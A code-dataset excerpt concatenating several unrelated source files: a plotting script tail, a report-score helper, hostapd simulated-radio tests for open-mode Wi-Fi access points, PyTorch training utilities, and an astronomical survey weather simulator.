cb = plt.colorbar(cr, format='%+.1e')
cb.solids.set_edgecolor('face')
cb.set_ticks(ticker.LinearLocator(6))
cb.ax.tick_params(labelsize=12)
rect.scatter(data0[:,0], data0[:,1], marker='v', facecolor='red', edgecolor='black', s=30, lw=1)
rect.scatter(data1[:,0], data1[:,1], marker='^', facecolor='blue', edgecolor='black', s=30, lw=1)
plt.xlim(X[0], X[-1])
plt.ylim(Y[0], Y[-1])
plt.xlabel("")
plt.ylabel("")
plt.grid(ls='dotted')
plt.savefig('{}.svg'.format(ID), bbox_inches='tight', pad_inches=0.1)
plt.savefig('{}.eps'.format(ID), bbox_inches='tight', pad_inches=0.1)
os.remove('dense.dat')
os.remove('data0.dat')
os.remove('data1.dat')
webbrowser.open('file://{}'.format(os.path.realpath('{}.svg'.format(sys.argv[1]))))
| 2.375 | 2 |
sarna/report_generator/scores.py | rsrdesarrollo/sarna | 25 | 3434 | <gh_stars>10-100
from sarna.model.enums import Score, Language
from sarna.report_generator import make_run
from sarna.report_generator.locale_choice import locale_choice
from sarna.report_generator.style import RenderStyle
def score_to_docx(score: Score, style: RenderStyle, lang: Language):
ret = make_run(getattr(style, score.name.lower()), locale_choice(score, lang))
for warn in style._warnings:
# TODO: something
print(warn)
return ret
| 2.203125 | 2 |
tests/hwsim/test_ap_open.py | waittrue/wireless | 1 | 3435 | # Open mode AP tests
# Copyright (c) 2014, Qualcomm Atheros, Inc.
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger()
import struct
import subprocess
import time
import os
import hostapd
import hwsim_utils
from tshark import run_tshark
from utils import alloc_fail
from wpasupplicant import WpaSupplicant
def test_ap_open(dev, apdev):
"""AP with open mode (no security) configuration"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
bg_scan_period="0")
ev = hapd.wait_event([ "AP-STA-CONNECTED" ], timeout=5)
if ev is None:
raise Exception("No connection event received from hostapd")
hwsim_utils.test_connectivity(dev[0], hapd)
dev[0].request("DISCONNECT")
ev = hapd.wait_event([ "AP-STA-DISCONNECTED" ], timeout=5)
if ev is None:
raise Exception("No disconnection event received from hostapd")
def test_ap_open_packet_loss(dev, apdev):
"""AP with open mode configuration and large packet loss"""
params = { "ssid": "open",
"ignore_probe_probability": "0.5",
"ignore_auth_probability": "0.5",
"ignore_assoc_probability": "0.5",
"ignore_reassoc_probability": "0.5" }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(0, 3):
dev[i].connect("open", key_mgmt="NONE", scan_freq="2412",
wait_connect=False)
for i in range(0, 3):
dev[i].wait_connected(timeout=20)
def test_ap_open_unknown_action(dev, apdev):
"""AP with open mode configuration and unknown Action frame"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
bssid = apdev[0]['bssid']
cmd = "MGMT_TX {} {} freq=2412 action=765432".format(bssid, bssid)
if "FAIL" in dev[0].request(cmd):
raise Exception("Could not send test Action frame")
ev = dev[0].wait_event(["MGMT-TX-STATUS"], timeout=10)
if ev is None:
raise Exception("Timeout on MGMT-TX-STATUS")
if "result=SUCCESS" not in ev:
raise Exception("AP did not ack Action frame")
def test_ap_open_invalid_wmm_action(dev, apdev):
"""AP with open mode configuration and invalid WMM Action frame"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
bssid = apdev[0]['bssid']
cmd = "MGMT_TX {} {} freq=2412 action=1100".format(bssid, bssid)
if "FAIL" in dev[0].request(cmd):
raise Exception("Could not send test Action frame")
ev = dev[0].wait_event(["MGMT-TX-STATUS"], timeout=10)
if ev is None or "result=SUCCESS" not in ev:
raise Exception("AP did not ack Action frame")
def test_ap_open_reconnect_on_inactivity_disconnect(dev, apdev):
"""Reconnect to open mode AP after inactivity related disconnection"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
hapd.request("DEAUTHENTICATE " + dev[0].p2p_interface_addr() + " reason=4")
dev[0].wait_disconnected(timeout=5)
dev[0].wait_connected(timeout=2, error="Timeout on reconnection")
def test_ap_open_assoc_timeout(dev, apdev):
"""AP timing out association"""
ssid = "test"
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].scan(freq="2412")
hapd.set("ext_mgmt_frame_handling", "1")
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
wait_connect=False)
for i in range(0, 10):
req = hapd.mgmt_rx()
if req is None:
raise Exception("MGMT RX wait timed out")
if req['subtype'] == 11:
break
req = None
if not req:
raise Exception("Authentication frame not received")
resp = {}
resp['fc'] = req['fc']
resp['da'] = req['sa']
resp['sa'] = req['da']
resp['bssid'] = req['bssid']
resp['payload'] = struct.pack('<HHH', 0, 2, 0)
hapd.mgmt_tx(resp)
assoc = 0
for i in range(0, 10):
req = hapd.mgmt_rx()
if req is None:
raise Exception("MGMT RX wait timed out")
if req['subtype'] == 0:
assoc += 1
if assoc == 3:
break
if assoc != 3:
raise Exception("Association Request frames not received: assoc=%d" % assoc)
hapd.set("ext_mgmt_frame_handling", "0")
dev[0].wait_connected(timeout=15)
def test_ap_open_id_str(dev, apdev):
"""AP with open mode and id_str"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", id_str="foo",
wait_connect=False)
ev = dev[0].wait_connected(timeout=10)
if "id_str=foo" not in ev:
raise Exception("CTRL-EVENT-CONNECT did not have matching id_str: " + ev)
if dev[0].get_status_field("id_str") != "foo":
raise Exception("id_str mismatch")
def test_ap_open_select_any(dev, apdev):
"""AP with open mode and select any network"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
id = dev[0].connect("unknown", key_mgmt="NONE", scan_freq="2412",
only_add_network=True)
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
only_add_network=True)
dev[0].select_network(id)
ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("No result reported")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
dev[0].select_network("any")
dev[0].wait_connected(timeout=10)
def test_ap_open_unexpected_assoc_event(dev, apdev):
"""AP with open mode and unexpected association event"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=15)
dev[0].dump_monitor()
# This will be accepted due to matching network
subprocess.call(['iw', 'dev', dev[0].ifname, 'connect', 'open', "2412",
apdev[0]['bssid']])
dev[0].wait_connected(timeout=15)
dev[0].dump_monitor()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=5)
dev[0].dump_monitor()
# This will result in disconnection due to no matching network
subprocess.call(['iw', 'dev', dev[0].ifname, 'connect', 'open', "2412",
apdev[0]['bssid']])
dev[0].wait_disconnected(timeout=15)
def test_ap_bss_load(dev, apdev):
"""AP with open mode (no security) configuration"""
hapd = hostapd.add_ap(apdev[0]['ifname'],
{ "ssid": "open",
"bss_load_update_period": "10" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
# this does not really get much useful output with mac80211_hwsim currently,
# but run through the channel survey update couple of times
for i in range(0, 10):
hwsim_utils.test_connectivity(dev[0], hapd)
hwsim_utils.test_connectivity(dev[0], hapd)
hwsim_utils.test_connectivity(dev[0], hapd)
time.sleep(0.15)
def hapd_out_of_mem(hapd, apdev, count, func):
with alloc_fail(hapd, count, func):
started = False
try:
hostapd.add_ap(apdev['ifname'], { "ssid": "open" })
started = True
except:
pass
if started:
raise Exception("hostapd interface started even with memory allocation failure: " + arg)
def test_ap_open_out_of_memory(dev, apdev):
"""hostapd failing to setup interface due to allocation failure"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_alloc_bss_data")
for i in range(1, 3):
hapd_out_of_mem(hapd, apdev[1], i, "hostapd_iface_alloc")
for i in range(1, 5):
hapd_out_of_mem(hapd, apdev[1], i, "hostapd_config_defaults;hostapd_config_alloc")
hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_config_alloc")
hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_driver_init")
for i in range(1, 4):
hapd_out_of_mem(hapd, apdev[1], i, "=wpa_driver_nl80211_drv_init")
# eloop_register_read_sock() call from i802_init()
hapd_out_of_mem(hapd, apdev[1], 1, "eloop_sock_table_add_sock;eloop_register_sock;?eloop_register_read_sock;=i802_init")
# verify that a new interface can still be added when memory allocation does
# not fail
hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open" })
def test_bssid_black_white_list(dev, apdev):
"""BSSID black/white list"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
hapd2 = hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_whitelist=apdev[1]['bssid'])
dev[1].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_blacklist=apdev[1]['bssid'])
dev[2].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_whitelist="00:00:00:00:00:00/00:00:00:00:00:00",
bssid_blacklist=apdev[1]['bssid'])
if dev[0].get_status_field('bssid') != apdev[1]['bssid']:
raise Exception("dev[0] connected to unexpected AP")
if dev[1].get_status_field('bssid') != apdev[0]['bssid']:
raise Exception("dev[1] connected to unexpected AP")
if dev[2].get_status_field('bssid') != apdev[0]['bssid']:
raise Exception("dev[2] connected to unexpected AP")
dev[0].request("REMOVE_NETWORK all")
dev[1].request("REMOVE_NETWORK all")
dev[2].request("REMOVE_NETWORK all")
dev[2].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_whitelist="00:00:00:00:00:00", wait_connect=False)
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_whitelist="11:22:33:44:55:66/ff:00:00:00:00:00 " + apdev[1]['bssid'] + " aa:bb:cc:dd:ee:ff")
dev[1].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_blacklist="11:22:33:44:55:66/ff:00:00:00:00:00 " + apdev[1]['bssid'] + " aa:bb:cc:dd:ee:ff")
if dev[0].get_status_field('bssid') != apdev[1]['bssid']:
raise Exception("dev[0] connected to unexpected AP")
if dev[1].get_status_field('bssid') != apdev[0]['bssid']:
raise Exception("dev[1] connected to unexpected AP")
dev[0].request("REMOVE_NETWORK all")
dev[1].request("REMOVE_NETWORK all")
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1)
if ev is not None:
raise Exception("Unexpected dev[2] connectin")
dev[2].request("REMOVE_NETWORK all")
def test_ap_open_wpas_in_bridge(dev, apdev):
"""Open mode AP and wpas interface in a bridge"""
br_ifname='sta-br0'
ifname='wlan5'
try:
_test_ap_open_wpas_in_bridge(dev, apdev)
finally:
subprocess.call(['ip', 'link', 'set', 'dev', br_ifname, 'down'])
subprocess.call(['brctl', 'delif', br_ifname, ifname])
subprocess.call(['brctl', 'delbr', br_ifname])
subprocess.call(['iw', ifname, 'set', '4addr', 'off'])
def _test_ap_open_wpas_in_bridge(dev, apdev):
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
br_ifname='sta-br0'
ifname='wlan5'
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
# First, try a failure case of adding an interface
try:
wpas.interface_add(ifname, br_ifname=br_ifname)
raise Exception("Interface addition succeeded unexpectedly")
except Exception, e:
if "Failed to add" in str(e):
logger.info("Ignore expected interface_add failure due to missing bridge interface: " + str(e))
else:
raise
# Next, add the bridge interface and add the interface again
subprocess.call(['brctl', 'addbr', br_ifname])
subprocess.call(['brctl', 'setfd', br_ifname, '0'])
subprocess.call(['ip', 'link', 'set', 'dev', br_ifname, 'up'])
subprocess.call(['iw', ifname, 'set', '4addr', 'on'])
subprocess.check_call(['brctl', 'addif', br_ifname, ifname])
wpas.interface_add(ifname, br_ifname=br_ifname)
wpas.connect("open", key_mgmt="NONE", scan_freq="2412")
def test_ap_open_start_disabled(dev, apdev):
"""AP with open mode and beaconing disabled"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open",
"start_disabled": "1" })
bssid = apdev[0]['bssid']
dev[0].flush_scan_cache()
dev[0].scan(freq=2412, only_new=True)
if dev[0].get_bss(bssid) is not None:
raise Exception("AP was seen beaconing")
if "OK" not in hapd.request("RELOAD"):
raise Exception("RELOAD failed")
dev[0].scan_for_bss(bssid, freq=2412)
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
def test_ap_open_start_disabled2(dev, apdev):
"""AP with open mode and beaconing disabled (2)"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open",
"start_disabled": "1" })
bssid = apdev[0]['bssid']
dev[0].flush_scan_cache()
dev[0].scan(freq=2412, only_new=True)
if dev[0].get_bss(bssid) is not None:
raise Exception("AP was seen beaconing")
if "OK" not in hapd.request("UPDATE_BEACON"):
raise Exception("UPDATE_BEACON failed")
dev[0].scan_for_bss(bssid, freq=2412)
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
if "OK" not in hapd.request("UPDATE_BEACON"):
raise Exception("UPDATE_BEACON failed")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
dev[0].request("RECONNECT")
dev[0].wait_connected()
def test_ap_open_ifdown(dev, apdev):
"""AP with open mode and external ifconfig down"""
params = { "ssid": "open",
"ap_max_inactivity": "1" }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
dev[1].connect("open", key_mgmt="NONE", scan_freq="2412")
subprocess.call(['ip', 'link', 'set', 'dev', apdev[0]['ifname'], 'down'])
ev = hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=10)
if ev is None:
raise Exception("Timeout on AP-STA-DISCONNECTED (1)")
ev = hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=5)
if ev is None:
raise Exception("Timeout on AP-STA-DISCONNECTED (2)")
ev = hapd.wait_event(["INTERFACE-DISABLED"], timeout=5)
if ev is None:
raise Exception("No INTERFACE-DISABLED event")
# The following wait tests beacon loss detection in mac80211 on dev0.
# dev1 is used to test stopping of AP side functionality on client polling.
dev[1].request("REMOVE_NETWORK all")
subprocess.call(['ip', 'link', 'set', 'dev', apdev[0]['ifname'], 'up'])
dev[0].wait_disconnected()
dev[1].wait_disconnected()
ev = hapd.wait_event(["INTERFACE-ENABLED"], timeout=10)
if ev is None:
raise Exception("No INTERFACE-ENABLED event")
dev[0].wait_connected()
hwsim_utils.test_connectivity(dev[0], hapd)
def test_ap_open_disconnect_in_ps(dev, apdev, params):
"""Disconnect with the client in PS to regression-test a kernel bug"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
bg_scan_period="0")
ev = hapd.wait_event([ "AP-STA-CONNECTED" ], timeout=5)
if ev is None:
raise Exception("No connection event received from hostapd")
time.sleep(0.2)
hwsim_utils.set_powersave(dev[0], hwsim_utils.PS_MANUAL_POLL)
try:
# inject some traffic
sa = hapd.own_addr()
da = dev[0].own_addr()
hapd.request('DATA_TEST_CONFIG 1')
hapd.request('DATA_TEST_TX {} {} 0'.format(da, sa))
hapd.request('DATA_TEST_CONFIG 0')
# let the AP send couple of Beacon frames
time.sleep(0.3)
# disconnect - with traffic pending - shouldn't cause kernel warnings
dev[0].request("DISCONNECT")
finally:
hwsim_utils.set_powersave(dev[0], hwsim_utils.PS_DISABLED)
time.sleep(0.2)
out = run_tshark(os.path.join(params['logdir'], "hwsim0.pcapng"),
"wlan_mgt.tim.partial_virtual_bitmap",
["wlan_mgt.tim.partial_virtual_bitmap"])
if out is not None:
state = 0
for l in out.splitlines():
pvb = int(l, 16)
if pvb > 0 and state == 0:
state = 1
elif pvb == 0 and state == 1:
state = 2
if state != 2:
raise Exception("Didn't observe TIM bit getting set and unset (state=%d)" % state)
def test_ap_open_select_network(dev, apdev):
"""Open mode connection and SELECT_NETWORK to change network"""
hapd1 = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
bssid1 = apdev[0]['bssid']
hapd2 = hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open2" })
bssid2 = apdev[1]['bssid']
id1 = dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
only_add_network=True)
id2 = dev[0].connect("open2", key_mgmt="NONE", scan_freq="2412")
hwsim_utils.test_connectivity(dev[0], hapd2)
dev[0].select_network(id1)
dev[0].wait_connected()
res = dev[0].request("BLACKLIST")
if bssid1 in res or bssid2 in res:
raise Exception("Unexpected blacklist entry")
hwsim_utils.test_connectivity(dev[0], hapd1)
dev[0].select_network(id2)
dev[0].wait_connected()
hwsim_utils.test_connectivity(dev[0], hapd2)
res = dev[0].request("BLACKLIST")
if bssid1 in res or bssid2 in res:
raise Exception("Unexpected blacklist entry(2)")
def test_ap_open_disable_enable(dev, apdev):
"""AP with open mode getting disabled and re-enabled"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
bg_scan_period="0")
for i in range(2):
hapd.request("DISABLE")
dev[0].wait_disconnected()
hapd.request("ENABLE")
dev[0].wait_connected()
hwsim_utils.test_connectivity(dev[0], hapd)
def sta_enable_disable(dev, bssid):
dev.scan_for_bss(bssid, freq=2412)
work_id = dev.request("RADIO_WORK add block-work")
ev = dev.wait_event(["EXT-RADIO-WORK-START"])
if ev is None:
raise Exception("Timeout while waiting radio work to start")
id = dev.connect("open", key_mgmt="NONE", scan_freq="2412",
only_add_network=True)
dev.request("ENABLE_NETWORK %d" % id)
if "connect@" not in dev.request("RADIO_WORK show"):
raise Exception("connect radio work missing")
dev.request("DISABLE_NETWORK %d" % id)
dev.request("RADIO_WORK done " + work_id)
ok = False
for i in range(30):
if "connect@" not in dev.request("RADIO_WORK show"):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("connect radio work not completed")
ev = dev.wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1)
if ev is not None:
raise Exception("Unexpected connection")
dev.request("DISCONNECT")
def test_ap_open_sta_enable_disable(dev, apdev):
"""AP with open mode and wpa_supplicant ENABLE/DISABLE_NETWORK"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
bssid = apdev[0]['bssid']
sta_enable_disable(dev[0], bssid)
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="force_connect_cmd=1")
sta_enable_disable(wpas, bssid)
| 2.28125 | 2 |
task_templates/pipelines/python3_pytorch_regression/model_utils.py | andreakropp/datarobot-user-models | 0 | 3436 | <reponame>andreakropp/datarobot-user-models
#!/usr/bin/env python
# coding: utf-8
# pylint: disable-all
from __future__ import absolute_import
from sklearn.preprocessing import LabelEncoder
from pathlib import Path
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
class BinModel(nn.Module):
expected_target_type = torch.FloatTensor
def __init__(self, input_size):
super(BinModel, self).__init__()
self.fc1 = nn.Linear(input_size, 50)
self.relu1 = nn.ReLU()
self.dout = nn.Dropout(0.2)
self.fc2 = nn.Linear(50, 100)
self.prelu = nn.PReLU(1)
self.out = nn.Linear(100, 1)
self.out_act = nn.Sigmoid()
def forward(self, input_):
a1 = self.fc1(input_)
h1 = self.relu1(a1)
dout = self.dout(h1)
a2 = self.fc2(dout)
h2 = self.prelu(a2)
a3 = self.out(h2)
y = self.out_act(a3)
return y
class RegModel(nn.Module):
def __init__(self, input_size):
super(RegModel, self).__init__()
self.fc1 = nn.Linear(input_size, 50)
self.relu1 = nn.ReLU()
self.dout = nn.Dropout(0.2)
self.fc2 = nn.Linear(50, 100)
self.prelu = nn.PReLU(1)
self.out = nn.Linear(100, 1)
def forward(self, input_):
a1 = self.fc1(input_)
h1 = self.relu1(a1)
dout = self.dout(h1)
a2 = self.fc2(dout)
h2 = self.prelu(a2)
y = self.out(h2)
return y
class MultiModel(nn.Module):
expected_target_type = torch.LongTensor
def __init__(self, input_size, output_size):
super(MultiModel, self).__init__()
self.layer1 = nn.Linear(input_size, 8)
self.relu = nn.ReLU()
self.layer2 = nn.Linear(8, output_size)
self.out = nn.Softmax()
def forward(self, input_):
out = self.layer1(input_)
out = self.relu(out)
out = self.layer2(out)
out = self.out(out)
return out
def train_epoch(model, opt, criterion, X, y, batch_size=50):
model.train()
losses = []
for beg_i in range(0, X.size(0), batch_size):
x_batch = X[beg_i : beg_i + batch_size, :]
# y_hat will be (batch_size, 1) dim, so coerce target to look the same
y_batch = y[beg_i : beg_i + batch_size].reshape(-1, 1)
x_batch = Variable(x_batch)
y_batch = Variable(y_batch)
opt.zero_grad()
# (1) Forward
y_hat = model(x_batch)
# (2) Compute diff
loss = criterion(y_hat, y_batch)
# (3) Compute gradients
loss.backward()
# (4) update weights
opt.step()
losses.append(loss.data.numpy())
return losses
def build_classifier(X, num_labels):
class_model = BinModel(X.shape[1]) if num_labels == 2 else MultiModel(X.shape[1], num_labels)
class_opt = optim.Adam(class_model.parameters(), lr=0.001)
class_criterion = nn.BCELoss() if num_labels == 2 else nn.CrossEntropyLoss()
return class_model, class_opt, class_criterion
def build_regressor(X):
reg_model = RegModel(X.shape[1])
reg_opt = optim.Adam(reg_model.parameters(), lr=0.001)
reg_criterion = nn.MSELoss()
return reg_model, reg_opt, reg_criterion
def train_classifier(X, y, class_model, class_opt, class_criterion, n_epochs=5):
target_encoder = LabelEncoder()
target_encoder.fit(y)
transformed_y = target_encoder.transform(y)
bin_t_X = torch.from_numpy(X.values).type(torch.FloatTensor)
bin_t_y = torch.from_numpy(transformed_y).type(class_model.expected_target_type)
for e in range(n_epochs):
train_epoch(class_model, class_opt, class_criterion, bin_t_X, bin_t_y)
def train_regressor(X, y, reg_model, reg_opt, reg_criterion, n_epochs=5):
reg_t_X = torch.from_numpy(X.values).type(torch.FloatTensor)
reg_t_y = torch.from_numpy(y.values).type(torch.FloatTensor)
for e in range(n_epochs):
train_epoch(reg_model, reg_opt, reg_criterion, reg_t_X, reg_t_y)
def save_torch_model(model, output_dir_path, filename="torch_bin.pth"):
output_file_path = Path(output_dir_path) / filename
torch.save(model, output_file_path)
def subset_data(X):
numerics = ["int16", "int32", "int64", "float16", "float32", "float64"]
# exclude any completely-missing columns when checking for numerics
num_features = list(X.dropna(axis=1, how="all").select_dtypes(include=numerics).columns)
# keep numeric features, zero-impute any missing values
# obviously this is a very rudimentary approach to handling missing values
# a more sophisticated imputer can be implemented by making use of custom transform, load, and predict hooks
return X[num_features].fillna(0)
| 2.6875 | 3 |
py/surveysim/weather.py | mlandriau/surveysim | 0 | 3437 | <reponame>mlandriau/surveysim
"""Simulate stochastic observing weather conditions.
The simulated conditions include seeing, transparency and the dome-open fraction.
"""
from __future__ import print_function, division, absolute_import
from datetime import datetime
import numpy as np
import astropy.time
import astropy.table
import astropy.units as u
import desiutil.log
import desimodel.weather
import desisurvey.config
import desisurvey.ephem
import desisurvey.utils
class Weather(object):
"""Simulate weather conditions affecting observations.
The start/stop date range is taken from the survey config.
Seeing and transparency values are stored with 32-bit floats to save
some memory.
Parameters
----------
seed : int
Random number seed to use to generate stochastic conditions.
The seed determines the same seeing and transparency realization
independent of the value of ``replay``.
replay : str
Either 'random' or a comma-separated list of years whose
historical weather should be replayed, e.g. 'Y2010,Y2012'.
Replayed weather will be used cyclically if necessary.
Random weather will be a boostrap sampling of all available
years with historical weather data. Use 'Y2015' for the
worst-case weather scenario.
time_step : float or :class:`astropy.units.Quantity`, optional
Time step calculating updates. Must evenly divide 24 hours.
If unitless float, will be interpreted as minutes.
restore : filename or None
Restore an existing weather simulation from the specified file name.
All other parameters are ignored when this is provided. A relative path
name refers to the :meth:`configuration output path
<desisurvey.config.Configuration.get_path>`.
extra_downtime : float
Additionally close the dome completely on some nights. Nights are
chosen randomly, with the chance of the night being closed equal to
extra_random_close_fraction. This is intended to include margin.
"""
def __init__(self, seed=1, replay='random', time_step=5, restore=None,
extra_downtime=0):
if not isinstance(time_step, u.Quantity):
time_step = time_step * u.min
self.log = desiutil.log.get_logger()
config = desisurvey.config.Configuration()
ephem = desisurvey.ephem.get_ephem()
if restore is not None:
fullname = config.get_path(restore)
self._table = astropy.table.Table.read(fullname)
self.start_date = desisurvey.utils.get_date(
self._table.meta['START'])
self.stop_date = desisurvey.utils.get_date(
self._table.meta['STOP'])
self.num_nights = self._table.meta['NIGHTS']
self.steps_per_day = self._table.meta['STEPS']
self.replay = self._table.meta['REPLAY']
self.log.info('Restored weather from {}.'.format(fullname))
return
else:
self.log.info('Generating random weather with seed={} replay="{}".'
.format(seed, replay))
gen = np.random.RandomState(seed)
# Use our config to set any unspecified dates.
start_date = config.first_day()
stop_date = config.last_day()
num_nights = (stop_date - start_date).days
if num_nights <= 0:
raise ValueError('Expected start_date < stop_date.')
# Check that the time step evenly divides 24 hours.
steps_per_day = int(round((1 * u.day / time_step).to(1).value))
if not np.allclose((steps_per_day * time_step).to(u.day).value, 1.):
raise ValueError(
'Requested time_step does not evenly divide 24 hours: {0}.'
.format(time_step))
# Calculate the number of times where we will tabulate the weather.
num_rows = num_nights * steps_per_day
meta = dict(START=str(start_date), STOP=str(stop_date),
NIGHTS=num_nights, STEPS=steps_per_day, REPLAY=replay)
self._table = astropy.table.Table(meta=meta)
# Initialize column of MJD timestamps.
t0 = desisurvey.utils.local_noon_on_date(start_date)
times = t0 + (np.arange(num_rows) / float(steps_per_day)) * u.day
self._table['mjd'] = times.mjd
# Generate a random atmospheric seeing time series.
dt_sec = 24 * 3600. / steps_per_day
self._table['seeing'] = desimodel.weather.sample_seeing(
num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32)
# Generate a random atmospheric transparency time series.
self._table['transparency'] = desimodel.weather.sample_transp(
num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32)
if replay == 'random':
# Generate a bootstrap sampling of the historical weather years.
years_to_simulate = config.last_day().year - config.first_day().year + 1
history = ['Y{}'.format(year) for year in range(2007, 2018)]
replay = ','.join(gen.choice(history, years_to_simulate, replace=True))
# Lookup the dome closed fractions for each night of the survey.
# This step is deterministic and only depends on the config weather
# parameter, which specifies which year(s) of historical daily
# weather to replay during the simulation.
dome_closed_frac = desimodel.weather.dome_closed_fractions(
start_date, stop_date, replay=replay)
r = gen.uniform(size=num_nights)
r2 = gen.uniform(size=num_nights)
dome_closed_frac[r2 < extra_downtime] = 1.
# Convert fractions of scheduled time to hours per night.
ilo, ihi = (start_date - ephem.start_date).days, (stop_date - ephem.start_date).days
bright_dusk = ephem._table['brightdusk'].data[ilo:ihi]
bright_dawn = ephem._table['brightdawn'].data[ilo:ihi]
dome_closed_time = dome_closed_frac * (bright_dawn - bright_dusk)
# Randomly pick between three scenarios for partially closed nights:
# 1. closed from dusk, then open the rest of the night.
# 2. open at dusk, then closed for the rest of the night.
# 3. open and dusk and dawn, with a closed period during the night.
# Pick scenarios 1+2 with probability equal to the closed fraction.
# Use a fixed number of random numbers to decouple from the seeing
# and transparency sampling below.
self._table['open'] = np.ones(num_rows, bool)
for i in range(num_nights):
sl = slice(i * steps_per_day, (i + 1) * steps_per_day)
night_mjd = self._table['mjd'][sl]
# Dome is always closed before dusk and after dawn.
closed = (night_mjd < bright_dusk[i]) | (night_mjd >= bright_dawn[i])
if dome_closed_frac[i] == 0:
# Dome open all night.
pass
elif dome_closed_frac[i] == 1:
# Dome closed all night. This occurs with probability frac / 2.
closed[:] = True
elif r[i] < 0.5 * dome_closed_frac[i]:
# Dome closed during first part of the night.
# This occurs with probability frac / 2.
closed |= (night_mjd < bright_dusk[i] + dome_closed_time[i])
elif r[i] < dome_closed_frac[i]:
# Dome closed during last part of the night.
# This occurs with probability frac / 2.
closed |= (night_mjd > bright_dawn[i] - dome_closed_time[i])
else:
# Dome closed during the middle of the night.
# This occurs with probability 1 - frac. Use the value of r[i]
# as the fractional time during the night when the dome reopens.
dome_open_at = bright_dusk[i] + r[i] * (bright_dawn[i] - bright_dusk[i])
dome_closed_at = dome_open_at - dome_closed_time[i]
closed |= (night_mjd >= dome_closed_at) & (night_mjd < dome_open_at)
self._table['open'][sl][closed] = False
self.start_date = start_date
self.stop_date = stop_date
self.num_nights = num_nights
self.steps_per_day = steps_per_day
self.replay = replay
def save(self, filename, overwrite=True):
"""Save the generated weather to a file.
The saved file can be restored using the constructor `restore`
parameter.
Parameters
----------
filename : str
Name of the file where the weather should be saved. A
relative path name refers to the :meth:`configuration output path
<desisurvey.config.Configuration.get_path>`.
overwrite : bool
Silently overwrite any existing file when this is True.
"""
config = desisurvey.config.Configuration()
filename = config.get_path(filename)
self._table.write(filename, overwrite=overwrite)
self.log.info('Saved weather to {0}.'.format(filename))
def get(self, time):
"""Get the weather conditions at the specified time(s).
Returns the conditions at the closest tabulated time, rather than
using interpolation.
Parameters
----------
time : astropy.time.Time
Time(s) when the simulated weather is requested.
Returns
-------
table slice
Slice of precomputed table containing row(s) corresponding
to the requested time(s).
"""
offset = np.floor(
(time.mjd - self._table['mjd'][0]) * self.steps_per_day + 0.5
).astype(int)
if np.any(offset < 0) or np.any(offset > len(self._table)):
raise ValueError('Cannot get weather beyond tabulated range.')
return self._table[offset]
| 2.71875 | 3 |
